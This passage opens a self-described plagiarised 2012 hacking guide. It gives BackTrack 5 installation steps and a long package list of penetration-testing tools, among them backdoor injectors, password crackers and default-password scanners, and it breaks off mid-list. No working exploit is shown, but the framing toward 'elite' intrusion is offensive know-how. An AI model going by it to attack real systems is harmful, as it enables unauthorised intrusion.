Comprehensive: Journey of a Hacker 2012 Vol-(I) From Intermediate Hacker To Elite Hacker. By Scryptaxxeler

A guide for those who want to be an Elite but can’t get the right direction. Disclaimer: This is work of pure plagiarism. It will be difficult to give reference to all those from whose works I am going to plagiarize. However some parts will be work of me any anyone can copy and distribute it as is. This will give an insight into the dark world of hackers, which will include much info regarding breaking and breaching of cyber crime laws. This is not to be used for Illegal purpose. But is intended for the letting the common people, System Administrators know where lies the weakest link. Remember, the chain is as weak as the weakest link. About: This book is intended to provide information on how to become an elite hacker. It’s much more than the CEH courses that are provided for script kiddies.

Brief overviews of the included topics are: The volume-1 is the Intermediate Level Hackers Book To hacking which includes:  Metasploit Framework  Burp Suite, W3AF Framework,etc.  How bank accounts are hacked.  Social Engineering Toolkit The volume-2 is the the Level where Hackers doesn’t rely on exploiting tools, he writes it himself which includes:  Sandbox Evasions.  Programming skills for a Hacker.  Reversing to the Level Of Assembly.  Heap Spraying, Use after Free, Stack Overflow.  Deciphering the cookie and much more.

PART-I

The hackers Framework

Chapter 1:Setting up a pentest edition of Linux. Chapter 2:The Metasploit Framework Chapter 3:Web Security:The Burp Suite and W3AF Chapter 4:Social Engineering Tools Chapter 1: Setting up a Penetration Testing Edition of Linux.

This chapter is intended to introduce to a penetration distribution of Linux. I will be discussing details of the Backtrack 5.But you guys can check NodeZero and Ubuntu Pentest Edition.

Lets begin then.

Backtrack:

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to-date. Our community of users range from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, and individuals new to the security community.

Feedback from all industries and skill levels allows us to truly develop a solution that is tailored towards everyone and far exceeds anything ever developed both commercially and freely available. The project is funded by Offensive Security. Whether you’re hacking wireless, exploiting servers, performing a web application assessment, learning, or social-engineering a client, BackTrack is the one-stop-shop for all of your security needs.

BackTrack Clean Hard Drive Install This method of installation is the simplest available. The assumption is that the whole hard drive is going to be used for BackTrack.

1. Boot BackTrack on the machine to be installed. Once booted, type in “startx” to get to the KDE graphical interface.

2. Double click the “install.sh” script on the desktop, or run the command “ubiquity” in console.

3. Select your geographical location and click “forward”. Same for the Keyboard layout.

4. The next screen allows you to configure the partitioning layout. The assumption is that we are deleting the whole drive and installing BackTrack on it.

5. Accept the installation summary and client “Install”. Allow the installation to run and

complete. Restart when done.

6. Log into BackTrack with the default username and password root / toor. Change root password.

7. Fix the framebuffer splash by typing “fix-splash” ( or “fix-splash800″ if you wish a 800×600 framebuffer), reboot. BackTrack Dual Boot Install with Windows (Tested on Win 7)

This method of installation is the simplest available. The assumption is that the you have a Windows installation taking up all the space on your drive, and you would like to resize and repartition your drive to allow a BackTrack install alongside your Windows. BACK UP YOUR WINDOWS INSTALLATION FIRST.

1. Boot BackTrack on the machine to be installed. Once booted, type in “startx” to get to the KDE graphical interface.

2. Double click the “install.sh” script on the desktop, or run the command “ubiquity” in console.

3. Select your geographical location and click “forward”. Same for the Keyboard layout.

4. The next screen allows you to configure the partitioning layout. The assumption is that we are resizing the Windows 7 partition and installing BackTrack on the newly

made space. 5. Accept the installation summary and client “Install”. Allow the installation to run and

complete. Restart when done.

6. Grub should allow you to boot both into BackTrack and Windows.

7. Log into BackTrack with the default username and password root / toor. Change root password.

8. Fix the framebuffer splash by typing “fix-splash” ( or “fix-splash800″ if you wish a 800×600 framebuffer), reboot.

BackTrack Live USB Install

This method of getting a live install to a USB drive is the simplest available using Unetbootin. Note that we will format the USB drive and erase its contents.

1. Plug in your USB Drive (Minimum USB Drive capacity 2 GB)

2. Format the USB drive to FAT32

3. Download Unetbootin from http://unetbootin.sourceforge.net/

4. Start Unetbootin and select diskimage (use the backtrack-final ISO)

5. Select your USB drive and click “OK” for creating a bootable BackTrack USB drive 6. Log into BackTrack with the default username and password root / toor.

Install BackTrack in VMWare.

1. Follow the basic install instructions here to get BackTrack installed in a VMware machine.

2. Log into BackTrack. To install the VMWare drivers, the kernel source and headers need to be in place. By default in the BackTrack 4 final release, the kernel (denoted by {version} ) is configured and ready. However in some cases, you might need to make sure you have the latest kernel sources by typing in:

apt-get update apt-get install linux-source cd /usr/src tar jxpf linux-source- {version}.tar.bz2 ln -s linux-source-{version} linux cd linux zcat /proc/config.gz > .config make scripts make prepare

3. Now that your kernel sources and headers are in place, run the “Install VMWare tools” for the specific guest VM.

4. Mount the VMWare tools virtual cd, copy over the VMWare tools package and run the installer:

mount /dev/cdrom3 /mnt/cdrom cp /mnt/cdrom/VMwareTools-{version}.tar.gz /tmp/ cd /tmp/ tar zxpf VMwareTools-{version}.tar.gz cd vmware-tools-distrib ./vmware- install.pl 5. Complete the VMWare tools installation as required. Run “fix-splash” to reintroduce

the green framebuffer console. Reboot.

Flicked From: Backtrack Official Site.

Well Installation done Lets have some understating of what it offers:

This will give you location of the Network Exploitation Tools in backtrack 5(For new users). As you can see Backtrack has already Grouped the essential Tools for You.

See other screen shot: This will take 1000 pages if I give screenshots for all the tools in Backtrack.The better is I give you the list and you can use google to find about the tools.Aint that cool.

The List you are going to see will blow you head off. I intended to include this for reference purposes. You can skip the list to around 100th page. The best way to learn about the tools is to use search engine which will be give you best access for gaining more knowlwdge of the tool.

Thanks to ZitsTif for the list that he has uploaded to his site. #############################NOTE########################################## Date: Fri Jul 15 16:42:13 EDT 2011 Version: Backtrack 5 - gnome - 32bit

A tool I installed that doesn't come with Backtrack 5 by default: sysv-rc-conf

Command I ran before running dpkg --list > toolslist.txt sudo apt-get update && sudo apt-get upgrade -y && sudo msfupdate

I also installed VirtualBox Guest Host Additions. ############################################################################

||/ Name Version Description ii 0trace 1.0-bt4 0trace is a traceroute tool that can be run within an existing, open TCP connection - therefore bypassing some types of stateful packet filters with ease. ii 3proxy 0.6.1-bt2 3APA3A 3proxy tiny proxy server ii ace 1.10-bt2 ACE (Automated Corporate Enumerator) is a simple yet powerful VoIP Corporate Directory enumeration tool that mimics the behavior of an IP Phone in order t ii adduser 3.112ubuntu1 add and remove users and groups ii admsnmp 0.1-bt3 SNMP audit scanner. ii afflib 3.6.10-bt1 An open source implementation of AFF written in C. ii air 2.0.0-bt2 AIR is a GUI front-end to dd/dc3dd designed for easily creating forensic images. ii aircrack-ng 1.1-bt9 Aircrack-ng wireless exploitation and enumeration suite ii alacarte 0.13.1-0ubuntu1 easy GNOME menu editing tool ii alsa-base 1.0.22.1+dfsg-0ubuntu3 ALSA driver configuration files ii alsa-tools 1.0.22-0ubuntu1 Console based ALSA utilities for specific hardware ii alsa-utils 1.0.22-0ubuntu5 ALSA utilities ii amap 5.2-bt4 Amap is a next-generation tool for assistingnetwork penetration testing. It performs fast and reliable application protocol detection, independant on the ii apache2 2.2.14-5ubuntu8.4 Apache HTTP Server metapackage ii apache2-mpm-prefork 2.2.14-5ubuntu8.4 Apache HTTP Server - traditional non-threaded model ii apache2-utils 2.2.14-5ubuntu8.4 utility programs for webservers ii apache2.2-bin 2.2.14-5ubuntu8.4 Apache HTTP Server common binary files ii apache2.2-common 2.2.14-5ubuntu8.4 Apache HTTP Server common files ii app-install-data 0.10.04.7 Ubuntu applications (data files) rc apparmor 2.5.1-0ubuntu0.10.04.3 User-space parser utility for AppArmor rc apparmor-utils 2.5.1-0ubuntu0.10.04.3 Utilities for controlling AppArmor ii apport 1.13.3-0ubuntu2 automatically generate crash reports for debugging ii apport-symptoms 0.9 symptom scripts for apport ii apt 0.7.25.3ubuntu9.4 Advanced front-end for dpkg ii apt-transport-https 0.7.25.3ubuntu9.4 APT https transport ii apt-utils 0.7.25.3ubuntu9.4 APT utility programs ii aptitude 0.4.11.11-1ubuntu10 terminal-based package manager ii arping 2.09-bt0 Broadcasts a who-has ARP packet on the network and prints answers. ii asleap 2.2-bt1 Demonstrates a serious deficiency in proprietary Cisco LEAP networks. ii asp-auditor 2.2-bt2 Look for common misconfigurations and information leaks in ASP.NET applications. ii aspell 0.60.6-3ubuntu1 GNU Aspell spell-checker ii aspell-en 6.0-0-5.1ubuntu3 English dictionary for GNU Aspell ii at 3.1.11-1ubuntu5.1 Delayed job execution and batch processing ii autoconf 2.65-3ubuntu1 automatic configure script builder ii automake 1:1.11.1-1 A tool for generating GNU Standards-compliant Makefiles ii autopsy 2.24-bt0 A graphical interface to TSK. ii autoscan 1.50-bt0 A network scanner (discovering and managing application). ii autotools-dev 20090611.1 Update infrastructure for config.{guess,sub} files ii avahi-daemon 0.6.25-1ubuntu6.2 Avahi mDNS/DNS-SD daemon ii axel 2.4-1 light download accelerator - console version ii backtrack-bash-profile 1.0-bt2 bash profile and bashrc files ii backtrack-bootsplash 1.0-bt2 BackTrack bootsplash ii backtrack-gnome-essential 1.5-bt3 Gnome menu and themes for BackTrack ii backtrack-menu-icons 1.5-bt3 BackTrack Menu Icons ii backtrack-utils 1.1-bt0 Small bash scripts and utilities ii backtrack-wallpapers 1.1-bt0 BackTrack Wallpapers ii base-files 5.0.0ubuntu20.10.04.3 Debian base system miscellaneous files ii base-passwd 3.5.22 Debian base system master password and group files ii bash 4.1-2ubuntu3 The GNU Bourne Again SHell ii bash-completion 1:1.1-3ubuntu2 programmable completion for the bash shell ii bc 1.06.95-2 The GNU bc arbitrary precision calculator language ii bed 0.5-bt1 BED is a program which is designed to check daemons for potential buffer overflows, format strings et. al. ii beef 0.4.0.0-bt1 BeEF, the Browser Exploitation Framework is a professional security tool provided for lawful research and testing purposes. It allows the experienced pene ii beef-ng 0.4.2.7-bt1 The Browser Exploitation Framework (BeEF) is a powerful professional security tool. BeEF is pioneering techniques that provide the experienced penetration ii bind9-host 1:9.7.0.dfsg.P1-1ubuntu0.1 Version of 'host' bundled with BIND 9.X ii binfmt-support 1.2.18 Support for extra binary formats ii binutils 2.20.1-3ubuntu7.1 The GNU assembler, linker and binary utilities ii bison 1:2.4.1.dfsg-3 A parser generator that is compatible with YACC ii bkhive 1.1.1-1 Dump the syskey bootkey from a Windows NT/2K/XP system hive ii blindelephant 1.0-bt3 Blind Elephant is an open-source generic web application fingerprinter that produces results by examining a small set of static files. ii blt 2.4z-4.2 the BLT extension library for Tcl/Tk - run-time package ii bluediving 0.9-bt1 Bluediving is a Bluetooth penetration testing suite. ii bluemaho 090417-bt0 BlueMaho is GUI-shell (interface) for suite of tools for testing security of bluetooth devices. It is freeware, opensource, written on python, uses wxPyho ii bluetooth 4.60-0ubuntu8 Bluetooth support ii bluez 4.91-bt0 BlueZ is official Linux Bluetooth protocol stack. It is an Open Source project distributed under GNU General Public License (GPL). BlueZ kernel is part of ii bluez-alsa 4.60-0ubuntu8 Bluetooth audio support ii bluez-cups 4.60-0ubuntu8 Bluetooth printer driver for CUPS ii bluez-gstreamer 4.60-0ubuntu8 Bluetooth GStreamer support ii bluez-hcidump 1.42-1build1 Analyses Bluetooth HCI packets ii bluez-utils 4.60-0ubuntu8 Transitional package ii bogl-bterm 0.1.18-3ubuntu4 Ben's Own Graphics Library - graphical terminal ii braa 0.82-bt2 Braa is a tool for making SNMP queries. ii bridge-utils 1.4-5ubuntu2 Utilities for configuring the Linux Ethernet bridge ii bsdmainutils 8.0.1ubuntu1 collection of more utilities from FreeBSD ii bsdutils 1:2.17.2-0ubuntu1.10.04.2 Basic utilities from 4.4BSD-Lite ii bt-system-menu-icons 1.0-bt1 BackTrack system menu icons ii btscanner 2.1-bt0 btscanner is a tool designed specifically to extract as much information as possible from a Bluetooth device without the requirement to pair. A detailed i ii build-essential 11.4build1 Informational list of build-essential packages ii bulk-extractor 0.7.18-bt0 A C++ program that scans a disk image (or any other file) and extracts useful information. ii burpsuite 1.4-bt0 integrated platform for performing security testing of web applications ii busybox-initramfs 1:1.13.3-1ubuntu11 Standalone shell setup for initramfs ii busybox-static 1:1.13.3-1ubuntu11 Standalone rescue shell with tons of builtin utilities ii byobu 2.68-0ubuntu1.1 a set of useful profiles and a profile-switcher for GNU screen ii bzip2 1.0.5-4ubuntu0.1 high-quality block-sorting file compressor - utilities ii ca-certificates 20090814 Common CA certificates ii ca-certificates-java 20100406ubuntu1 Common CA certificates (JKS keystore) ii cabextract 1.2-3+lenny1build0.10.04.1 a program to extract Microsoft Cabinet files ii capplets-data 1:2.30.1-0ubuntu1 configuration applets for GNOME - data files ii cewl 3.0-bt6 CeWL, the Custom Word List generator. ii chkrootkit 0.49-bt0 A tool to locally check for signs of a rootkit. ii chntpw 100627-bt0 The Offline NT Password Editor ii cisco-auditing-tool 1.0-bt1 Perl script which scans cisco routers for common vulnerabilities. ii cisco-global-exploiter 13-bt1 Cisco Global Exploiter (CGE), is an advanced, simple and fast security testing tool. ii cisco-ocs 0.1-bt3 Mass cisco scanner ii ciscos 1.3-bt1 Cisco Scanner will scan a range of IP address for Cisco routers that havn't changed their default password of "cisco". ii cmospwd 5.0-bt0 Decrypts password stored in cmos used to access BIOS SETUP. ii cms-explorer 1.0-bt2 CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running. ii command-not-found 0.2.40ubuntu5 Suggest installation of packages in interactive bash sessions ii command-not-found-data 0.2.40ubuntu5 Set of data files for command-not-found. ii complemento 0.7.6-bt3 Complemento is a collection of tools for pentester: LetDown is a powerful tcp flooder ReverseRaider is a domain scanner that use wordlist scanning or reve ii console-setup 1.34ubuntu15 console font and keymap setup program ii console-terminus 4.30-2 Fixed-width fonts for fast reading on the Linux console ii consolekit 0.4.1-3ubuntu2 framework for defining and tracking users, sessions and seats ii copy-router-config 4.0-bt3 Copy Cisco Router config - Using SNMP. ii coreutils 7.4-2ubuntu3 The GNU core utilities ii cowpatty 4.3-bt0 coWPAtty - Attacking WPA/WPA2-PSK Exchanges ii cpio 2.10-1ubuntu2 GNU cpio -- a program to manage archives of files ii cpp 4:4.4.3-1ubuntu1 The GNU C preprocessor (cpp) ii cpp-4.4 4.4.3-4ubuntu5 The GNU C preprocessor ii cpu-checker 0.1-0ubuntu2 tools to help evaluate certain CPU (or BIOS) features ii cron 3.0pl1-106ubuntu5 process scheduling daemon ii cryptcat 1.2.1-bt2 Cryptcat is the standard netcat enhanced with twofish encryption. ii cryptsetup 2:1.1.0~rc2-1ubuntu13 configures encrypted block devices ii cupp 3.1-bt0 Common User Passwords Profiler ii cups 1.4.3-1ubuntu1.4 Common UNIX Printing System(tm) - server ii cups-bsd 1.4.3-1ubuntu1.4 Common UNIX Printing System(tm) - BSD commands ii cups-client 1.4.3-1ubuntu1.4 Common UNIX Printing System(tm) - client programs (SysV) ii cups-common 1.4.3-1ubuntu1.4 Common UNIX Printing System(tm) - common files ii cups-driver-gutenprint 5.2.5-0ubuntu1.1 printer drivers for CUPS ii curl 7.19.7-1ubuntu1 Get a file from an HTTP, HTTPS or FTP server ii cve 1.0-bt1 Firefox link to Mitre-CVE. ii cvs 1:1.12.13-12ubuntu1 Concurrent Versions System ii cymothoa 1alpha-bt0 Cymothoa is a stealth backdooring tool, that inject backdoor's shellcode into an existing process. ii darkmysqli 1.0-bt2 Multi-Purpose MySQL Injection Tool. ii dash 0.5.5.1-3ubuntu2 POSIX-compliant shell ii dbus 1.2.16-2ubuntu4.2 simple interprocess messaging system ii dbus-x11 1.2.16-2ubuntu4.2 simple interprocess messaging system (X11 deps) ii dc3dd 7.0.0-bt0 A patched version of GNU dd to include a number of features useful for computer forensics. ii dcfldd 1.3.4.1-2 enhanced version of dd for forensics and security ii ddrescue 1.14-bt0 Like dd, dd_rescue does copy data from one file or block device to another. ii debconf 1.5.28ubuntu4 Debian configuration management system ii debconf-i18n 1.5.28ubuntu4 full internationalization support for debconf ii debianutils 3.2.2 Miscellaneous utilities specific to Debian ii default-jre 1.6-34 Standard Java or Java compatible Runtime ii default-jre-headless 1.6-34 Standard Java or Java compatible Runtime (headless) ii defoma 0.11.10-4ubuntu1 Debian Font Manager -- automatic font configuration framework ii desktop-file-utils 0.16-0ubuntu2 Utilities for .desktop files ii dhcp3-client 3.1.3-2ubuntu3.2 DHCP client ii dhcp3-common 3.1.3-2ubuntu3.2 common files used by all the dhcp3* packages ii dialog 1.1-20080819-1 Displays user-friendly dialog boxes from shell scripts ii dictionaries-common 1.4.0ubuntu2 Common utilities for spelling dictionary tools ii diffutils 1:2.8.1-18 File comparison utilities ii dirbuster 0.12-bt2 DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of wh ii discover 2.1.2-3 hardware identification system ii discover-data 2.2009.12.19 Data lists for Discover hardware detection system ii discover1 2.1.2-3 transitional package ii disktype 9-1 detection of content format of a disk or disk image ii dmidecode 2.9-1.2 Dump Desktop Management Interface data ii dmitry 1.3a-bt2 DMitry has the ability to gather as much information as possible about a host. ii dmraid 1.0.0.rc16-3ubuntu2 Device-Mapper Software RAID support tool ii dmsetup 2:1.02.39-1ubuntu4.1 The Linux Kernel Device Mapper userspace library ii dnet-common 2.49ubuntu1 Base package for Linux DECnet ii dns2tcp 0.5.2-bt1 Dns2tcp is a tool for relaying TCP connections over DNS. ii dnsenum 1.2.2-bt0 dnsenum script for enumerating DNS servers ii dnsmap 0.30-bt3 dnsmap is mainly meant to be used by pentesters during the information gathering/enumeration phase of infrastructure security assessments. ii dnsrecon 0.3-bt2 DNS Enumeration Script ii dnstracer 1.9-bt2 Dnstracer determines where a given Domain Name Server (DNS) gets its information from, and follows the chain of DNS servers back to the servers which know ii dnsutils 1:9.7.0.dfsg.P1-1ubuntu0.1 Clients provided with BIND ii dnswalk 2.0.2-bt1 dnswalk is a DNS debugger. It performs zone transfers of specifieddomains, and checks the database in numerous ways for internalconsistency, as well as ac ii docbook-xml 4.5-7 standard XML documentation system for software and systems ii dos2unix 5.0-bt0 Includes utilities to convert text files with DOS or Mac line endings to Unix line endings. ii dosfstools 3.0.7-1 utilities for making and checking MS-DOS FAT filesystems ii dpkg 1.15.5.6ubuntu4.5 Debian package management system ii dpkg-dev 1.15.5.6ubuntu4.5 Debian package development tools ii dradis 2.7.0-bt3 Dradis is an open source framework to enable effective information sharing, specially during security assessments. ii driftnet 0.1.6-bt2 A program which listens to network traffic and picks out images. ii dsniff 2.4b1-bt1 A collection of tools for network auditing and penetration testing. ii e2fslibs 1.41.11-1ubuntu2.1 ext2/ext3/ext4 file system libraries ii e2fsprogs 1.41.11-1ubuntu2.1 ext2/ext3/ext4 file system utilities ii eapmd5pass 1.4-bt0 An implementation of an offline dictionary attack against the EAP-MD5 protocol. ii ecryptfs-utils 83-0ubuntu3.1 ecryptfs cryptographic filesystem (utilities) ii ed 1.4-1build1 The classic UNIX line editor ii eject 2.1.5+deb1+cvs20081104-7 ejects CDs and operates CD-Changers under Linux ii enumiax 1.0-bt3 enumIAX is an Inter Asterisk Exchange version 2 (IAX2) protocol username brute-force enumerator. enumIAX may operate in two distinct modes; Sequential Use ii eog 2.30.0-0ubuntu1 Eye of GNOME graphics viewer program ii esound-clients 0.2.41-6ubuntu1 Enlightened Sound Daemon - clients ii esound-common 0.2.41-6ubuntu1 Enlightened Sound Daemon - Common files ii eterm 0.9.5-2ubuntu1 Enlightened Terminal Emulator ii ethtool 6+20091202-1 display or change Ethernet device settings ii ettercap-common 1:0.7.3-1.4ubuntu1 Common support files and plugins for ettercap ii ettercap-desktop 0.7.3-bt2 Multipurpose sniffer/interceptor/logger for switched LAN. ii ettercap-gtk 1:0.7.3-1.4ubuntu1 Multipurpose sniffer/interceptor/logger for switched LAN ii evolution-data-server 2.28.3.1-0ubuntu6 evolution database backend server ii evolution-data-server-common 2.28.3.1-0ubuntu6 architecture independent files for Evolution Data Server ii evtparse.pl 1.0-bt0 Script to parse Windows 2000/XP/2003 Event Log files. ii ewf-tools 20100119-1 collection of tools for reading and writing EWF files ii ewfacquire 20100119-bt1 Use ewfacquire to acquire data from a file or device and store it in the EWF format. ii exif 0.6.19-1 command-line utility to show EXIF information in JPEG files ii exiftool 8.56-bt0 ExifTool is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of fil ii exiv2 0.19-1 EXIF/IPTC metadata manipulation tool ii expat 2.0.1-7ubuntu1 XML parsing C library - example application ii exploitdb 2.0-bt0 A SVN archive of the exploit-db. ii extract 0.5.23+dfsg-4build1 displays meta-data from files of arbitrary type ii fakeroot 1.14.4-1ubuntu1 Gives a fake root environment ii fancontrol 1:3.1.2-2 utilities to read temperature/voltage/fan sensors ii farpd 0.2-10 Fake ARP user space daemon ii fasttrack 4.0.1-bt1 Fast-Track is an exploitation framework used to automated penetration testing efforts. ii fatback 1.3-bt2 A *nix tool for recovering files from FAT file systems. ii fcrackzip 1.0-bt1 fcrackzip is a zip password cracker, similar to fzc, zipcrack and others. ii festival 1.96~beta-10ubuntu1 General multi-lingual speech synthesis system ii festlex-cmu 1.4.0-6 CMU dictionary for Festival ii festlex-poslex 1.4.0-5 Part of speech lexicons and ngram from English ii festvox-kallpc16k 1.4.0-5 American English male speaker for festival, 16khz sample rate ii fierce 0.9.9-bt4 Fierce is a PERL script that quickly scans domains. ii fiked 0.0.5-bt0 FakeIKEd, or fiked for short, is a fake IKE daemon supporting just enough of the standards and Cisco extensions to attack commonly found insecure Cisco VP ii file 5.03-5ubuntu1 Determines file type using "magic" numbers ii fimap 0.8.1-bt2 fimap is a little python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. ii findutils 4.4.2-1ubuntu1 utilities for finding files--find, xargs ii firebird2.1-common 2.1.3.18185-0.ds1-6build1 common files for firebird 2.1 servers and clients ii firebird2.1-common-doc 2.1.3.18185-0.ds1-6build1 copyright, licensing and changelogs of firebird2.1 ii firefox 4.0.1-bt0 Firefox web browser ii firefox-user-profile 1.0-bt2 Firefox profile ii flashplugin-installer 10.2.159.1ubuntu0.10.04.1 Adobe Flash Player plugin installer ii fontconfig 2.8.0-2ubuntu1 generic font configuration library - support binaries ii fontconfig-config 2.8.0-2ubuntu1 generic font configuration library - configuration ii foomatic-db 20100216-0ubuntu3 OpenPrinting printer support - database ii foomatic-db-engine 4.0.4-0ubuntu1 OpenPrinting printer support - programs ii foomatic-filters 4.0.4-0ubuntu1 OpenPrinting printer support - filters ii foremost 1.5.7-bt0 A console program to recover files based on their headers, footers, and internal data structures. ii fping 2.4b2-bt0 A ping-like program which uses the Internet Control Message Protocol (ICMP) echo request to determine if a host is up. ii fragroute 1.2-bt1 fragroute intercepts, modifies, and rewrites egress traffic destined for a specified host ii fragrouter 1.6-bt3 Fragrouter is a network intrusion detection evasion toolkit. ii framework2 2.8-bt0 A powerful exploitation framework. ii framework3 3.7.0-bt1 Metasploit Exploitation Framework ii freeradius-wpe 2.1.7-bt1 A patch for the popular open-source FreeRADIUS implementation to demonstrate RADIUS impersonation vulnerabilities by Joshua Wright and Brad Antoniewicz, d ii freetds-common 0.82-6build1 configuration files for FreeTDS SQL client libraries ii friendly-recovery 0.2.10 Make recovery more user-friendly ii ftester 1.0-bt0 A tool designed for testing firewall filtering policies and Intrusion Detection System (IDS) capabilities. ii ftp 0.17-19build1 The FTP client ii funkload 1.16.0-bt0 FunkLoad is a functional and load web tester, written in Python ii fuse-utils 2.8.1-1.1ubuntu3.1 Filesystem in USErspace (utilities) ii fvwm1 1.24r-54 Old version of the F(?) Virtual Window Manager ii g++ 4:4.4.3-1ubuntu1 The GNU C++ compiler ii g++-4.4 4.4.3-4ubuntu5 The GNU C++ compiler ii galleta 1.0+20040505-5 An Internet Explorer cookie forensic analysis tool ii gamin 0.1.10-1ubuntu3 File and directory monitoring system ii gawk 1:3.1.6.dfsg-4build1 GNU awk, a pattern scanning and processing language ii gcc 4:4.4.3-1ubuntu1 The GNU C compiler ii gcc-4.4 4.4.3-4ubuntu5 The GNU C compiler ii gcc-4.4-base 4.4.3-4ubuntu5 The GNU Compiler Collection (base package) ii gconf2 2.28.1-0ubuntu1 GNOME configuration database system (support tools) ii gconf2-common 2.28.1-0ubuntu1 GNOME configuration database system (common files) ii gedit 2.30.3-0ubuntu0.1 official text editor of the GNOME desktop environment ii gedit-common 2.30.3-0ubuntu0.1 official text editor of the GNOME desktop environment (support files) ii genisoimage 9:1.1.10-1ubuntu1 Creates ISO-9660 CD-ROM filesystem images ii geoip-database 1.4.6.dfsg-17 IP lookup command line tools that use the GeoIP library (country database) ii gerix-wifi-cracker-ng 2.0-bt2 Aicrack-NG (WPA/WEP) GUI with pyrit support on cracking ii gettext 0.17-8ubuntu3 GNU Internationalization utilities ii gettext-base 0.17-8ubuntu3 GNU Internationalization utilities for the base system ii ghdb 1.0-bt1 Firefox link to GHDB. ii ghostscript 8.71.dfsg.1-0ubuntu5.3 The GPL Ghostscript PostScript/PDF interpreter ii ghostscript-cups 8.71.dfsg.1-0ubuntu5.3 The GPL Ghostscript PostScript/PDF interpreter - CUPS filters ii gir1.0-atk-1.0 1.30.0-0ubuntu2.1 The ATK accessibility toolkit ii gir1.0-clutter-1.0 1.2.4-0ubuntu1 GObject introspection data for the Clutter 1.0 library ii gir1.0-freedesktop 0.6.8-1 Introspection data for some FreeDesktop components ii gir1.0-glib-2.0 0.6.8-1 Introspection data for GLib, GObject, Gio and GModule ii gir1.0-gtk-2.0 2.20.1-0ubuntu2 The GTK+ graphical user interface library ii gir1.0-mutter-2.28 2.28.1~git20091208-1ubuntu7 GObject introspection data for Mutter ii gir1.0-pango-1.0 1.28.0-0ubuntu2.2 Layout and rendering of internationalized text ii giskismet 1.0-bt2 GISKismet is a wireless recon visualization tool to represent data gathered using Kismet in a flexible manner. GISKismet stores the information in a datab ii git-core 1:1.7.0.4-1ubuntu0.2 fast, scalable, distributed revision control system ii gksu 2.0.2-2ubuntu2 graphical frontend to su ii globalplatform 6.0.0-bt0 The GlobalPlatform card specification is a standard for the management of the contents on a smart card. Mainly this comprises the installation and the rem ii gnome-about 1:2.30.2-0ubuntu1 The GNOME about box ii gnome-applets 2.30.0-0ubuntu2 Various applets for the GNOME panel - binary files ii gnome-applets-data 2.30.0-0ubuntu2 Various applets for the GNOME panel - data files ii gnome-control-center 1:2.30.1-0ubuntu1 utilities to configure the GNOME desktop ii gnome-core 1:2.28+1ubuntu3 The GNOME Desktop Environment -- essential components ii gnome-desktop-data 1:2.30.2-0ubuntu1 Common files for GNOME desktop apps ii gnome-doc-utils 0.20.0-0ubuntu2 a collection of documentation utilities for the GNOME project ii gnome-exe-thumbnailer 0.7-0ubuntu1~lucid1 Wine .exe and other executable thumbnailer for Gnome ii gnome-extra-icons 1.1-2 Optional GNOME icons ii gnome-icon-theme 2.28.0-1ubuntu1 GNOME Desktop icon theme ii gnome-keyring 2.92.92.is.2.30.3-0ubuntu1.1 GNOME keyring services (daemon and tools) ii gnome-media 2.30.0-0ubuntu1 GNOME media utilities ii gnome-media-common 2.30.0-0ubuntu1 GNOME media utilities - common files ii gnome-menus 2.30.0-0ubuntu4 an implementation of the freedesktop menu specification for GNOME ii gnome-mime-data 2.18.0-1 base MIME and Application database for GNOME. ii gnome-panel 1:2.30.2-0ubuntu0.2 launcher and docking facility for GNOME ii gnome-panel-data 1:2.30.2-0ubuntu0.2 common files for the GNOME Panel ii gnome-power-manager 2.30.0-0ubuntu1 power management tool for the GNOME desktop ii gnome-session 2.30.0-0ubuntu1 The GNOME Session Manager ii gnome-session-bin 2.30.0-0ubuntu1 The GNOME Session Manager - Minimal runtime ii gnome-settings-daemon 2.30.1-0ubuntu1.1 daemon handling the GNOME session settings ii gnome-shell 2.28.1~git20091125-1ubuntu0.2 graphical shell for the GNOME desktop ii gnome-system-monitor 2.28.0-1ubuntu2 Process viewer and system resource monitor for GNOME ii gnome-terminal 2.30.2-0ubuntu1 The GNOME terminal emulator application ii gnome-terminal-data 2.30.2-0ubuntu1 Data files for the GNOME terminal emulator ii gnome-themes-ubuntu 0.6.1 Ubuntu community themes ii gnome-user-guide 2.30.0+git20100403ubuntu2 GNOME user's guide ii gnupg 1.4.10-2ubuntu1 GNU privacy guard - a free PGP replacement ii gnupg-curl 1.4.10-2ubuntu1 GNU privacy guard - a free PGP replacement (cURL) ii gnuplot 4.2.6-1 A command-line driven interactive plotting program ii gnuplot-nox 4.2.6-1 A command-line driven interactive plotting program ii gnuplot-x11 4.2.6-1 A command-line driven interactive plotting program ii goohost 0.0.1-bt1 Simple script that extracts hosts/subdomains, ip or emails for a specific domain with Google search. ii gooscan 1.0-bt2 Gooscan is a tool developed by Johny Long. It automates queries against Google search appliances with the goal to identify vulnerabilities on web sites. ii gpgv 1.4.10-2ubuntu1 GNU privacy guard - signature verification tool ii gpsd 2.92-4 Global Positioning System - daemon ii gpshell 1.4.4-bt0 GPshell for Globalplatform ii grabber 0.1-bt1 Grabber is a web application scanner. ii graphviz 2.20.2-8ubuntu3 rich set of graph drawing tools ii grendel-scan 1.0-bt1 Grendel-Scan is an open-source web application security testing tool. ii grep 2.5.4-4build1 GNU grep, egrep and fgrep ii groff 1.20.1-7 GNU troff text-formatting system ii groff-base 1.20.1-7 GNU troff text-formatting system (base system components) ii grub-common 1.98-1ubuntu12 GRand Unified Bootloader, version 2 (common files) ii grub-pc 1.98-1ubuntu12 GRand Unified Bootloader, version 2 (PC/BIOS version) ii gsfonts 1:8.11+urwcyr1.0.7~pre44-4 Fonts for the Ghostscript interpreter(s) ii gstreamer0.10-plugins-base 0.10.28-1 GStreamer plugins from the "base" set ii gstreamer0.10-plugins-good 0.10.21-1ubuntu3 GStreamer plugins from the "good" set ii gstreamer0.10-pulseaudio 0.10.21-1ubuntu3 GStreamer plugin for PulseAudio ii gstreamer0.10-x 0.10.28-1 GStreamer plugins for X11 and Pango ii gtk2-engines 1:2.20.0-0ubuntu1 theme engines for GTK+ 2.x ii gtk2-engines-murrine 0.90.3+git20100323-0ubuntu3 cairo-based gtk+-2.0 theme engine ii gtk2-engines-pixbuf 2.20.1-0ubuntu2 Pixbuf-based theme for GTK+ 2.x ii gvfs 